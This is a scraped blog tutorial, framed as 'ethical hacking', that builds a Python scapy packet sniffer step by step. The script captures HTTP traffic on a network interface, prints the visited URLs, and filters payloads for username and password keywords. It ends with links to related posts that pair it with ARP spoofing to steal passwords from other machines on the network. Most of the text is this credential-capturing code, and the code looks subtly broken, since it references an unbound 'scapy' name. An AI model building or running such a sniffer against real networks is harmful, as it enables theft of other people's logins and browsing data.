PACKET_SNIFFER

  • Capture data flowing through an interface.
  • Filter this data.
  • Display Interesting information such as:
    • Login info(username&password).
    • Visited websites.
    • Images.
    • ...etc

PACKET_SNIFFER

CAPTURE & FILTER DATA

  • scapy has a sniffer function.
  • Can capture data sent to/from iface.
  • Can call a function specified in prn on each packet.

Install the third party package.

pip install scapy_http

1. Write the Python to sniff all the Raw packets.

#!/usr/bin/env python

from scapy.all import *

from scapy.layers.http import *

def sniff(interface):

    scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)

def process_sniffed_packet(packet):

    if packet.haslayer(HTTPRequest):

        if packet.haslayer(scapy.all.Raw):

            print(packet.show())

sniff("eth0")

Execute the script and sniff the packets on eth0.

2. Filter the useful packets

#!/usr/bin/env python

from scapy.all import *

from scapy.layers.http import *

def sniff(interface):

    scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)

def process_sniffed_packet(packet):

    if packet.haslayer(HTTPRequest):

        if packet.haslayer(scapy.all.Raw):

            print(packet[scapy.all.Raw].load)

sniff("eth0")

Execute the script and sniff the packets on eth0.

Rewrite the Python Script to filter the keywords.

#!/usr/bin/env python

from scapy.all import *

from scapy.layers.http import *

def sniff(interface):

    scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)

def process_sniffed_packet(packet):

    if packet.haslayer(HTTPRequest):

        if packet.haslayer(scapy.all.Raw):

            load = packet[scapy.all.Raw].load.decode(errors='ignore')

            keywords = ["username", "user", "login", "password", "pass"]

            for keyword in keywords:

                if keyword in load:

                    print(load)

                    break

sniff("eth0")

Add the feature - Extracting URL

#!/usr/bin/env python

from scapy.all import *

from scapy.layers.http import *

def sniff(interface):

    scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)

def process_sniffed_packet(packet):

    if packet.haslayer(HTTPRequest):

        url = packet[HTTPRequest].Host + packet[HTTPRequest].Path

        print(url)

        if packet.haslayer(scapy.all.Raw):

            load = packet[scapy.all.Raw].load.decode(errors='ignore')

            keywords = ["username", "user", "login", "password", "pass"]

            for keyword in keywords:

                if keyword in load:

                    print(load)

                    break

sniff("eth0")

Python Ethical Hacking - Packet Sniffer(1)的更多相关文章

  1. Python Ethical Hacking - Packet Sniffer(2)

     Capturing passwords from any computer connected to the same network.  ARP_SPOOF + PACKET_SNIFFER Ta ...

  2. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  3. Python Ethical Hacking - NETWORK_SCANNER(1)

    NETWORK_SCANNER Discover all devices on the network. Display their IP address. Display their MAC add ...

  4. Python Ethical Hacking - Bypass HTTPS(1)

    HTTPS: Problem: Data in HTTP is sent as plain text. A MITM can read and edit requests and responses. ...

  5. Python Ethical Hacking - BeEF Framework(1)

    Browser Exploitation Framework. Allows us to launch a number of attacks on a hooked target. Targets ...

  6. Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(3)

    Recalculating Content-Length: #!/usr/bin/env python import re from netfilterqueue import NetfilterQu ...

  7. Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(2)

    MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...

  8. Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(1)

    MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...

  9. Python Ethical Hacking - DNS Spoofing

    What is DNS Spoofing Sniff the DNSRR packet and show on the terminal. #!/usr/bin/env python from net ...

随机推荐

  1. Java 多线程基础(九)join() 方法

    Java 多线程基础(九)join 方法 一.join() 方法介绍 join() 定义 Thread 类中的,作用是:把指定的线程加入到当前线程,可以将两个交替执行的线程合并为顺序执行的线程.如:线 ...

  2. Linux 进程间通信(IPC)总结

    概述 一个大型的应用系统,往往需要众多进程协作,进程(Linux进程概念见附1)间通信的重要性显而易见.本系列文章阐述了 Linux 环境下的几种主要进程间通信手段. 进程隔离 进程隔离是为保护操作系 ...

  3. SSL/TSL 原理( 握手原理和传输原理)

    本文参考<计算机网络 自顶向下方法> 目录 背景 通信的4要素 SSL/TLS in Detail 通讯保证 The Handshake Protocol 1. Initial Clien ...

  4. DNS区域传输和DNS字典爆破

    nslookup命令是已知域名的的解析记录下进行的查询.打个比方,已知sina.com这个域名有www.sina.com这条主机解析记录,就可以查询www.sina.com对应的ip以及其他相关信息. ...

  5. SSTI-服务端模板注入漏洞

      原理: 服务端模板注入是由于服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,因而导致了敏感信息泄露.代码执行.GetShell ...

  6. python用pandas遍历csv文件

    import pandas as pd df = pd.read_csv('a.csv') for index, row in df.iterrows(): x, y = row['X'], row[ ...

  7. Python自学——pygame安装

    本片文章介绍pygame的安装方法.一则跟广大初学者分享经历,二则做个自我总结. pygame是python的库文件,跟一般的应用软件安装方法不太一样.我电脑上的python版本是python3.7, ...

  8. unable to load script from assets 'index.android bundle'

    在Android手机上运行React-native项目时 报错:unable to load script from assets 'index.android bundle'  ,make sure ...

  9. webpack入门进阶(3)

    1.11.预处理器文件处理 1.sass文件 sass这种css预处理器是以.scss结尾,需要用node-sass和sass-loader来处理 安装loader npm i node-sass s ...

  10. js基础练习题(3)

    8.this 1.举例说说apply方法和call方法的作用和区别 2.读下面代码,写程序结果 function identify () { return this.name.toUpperCase( ...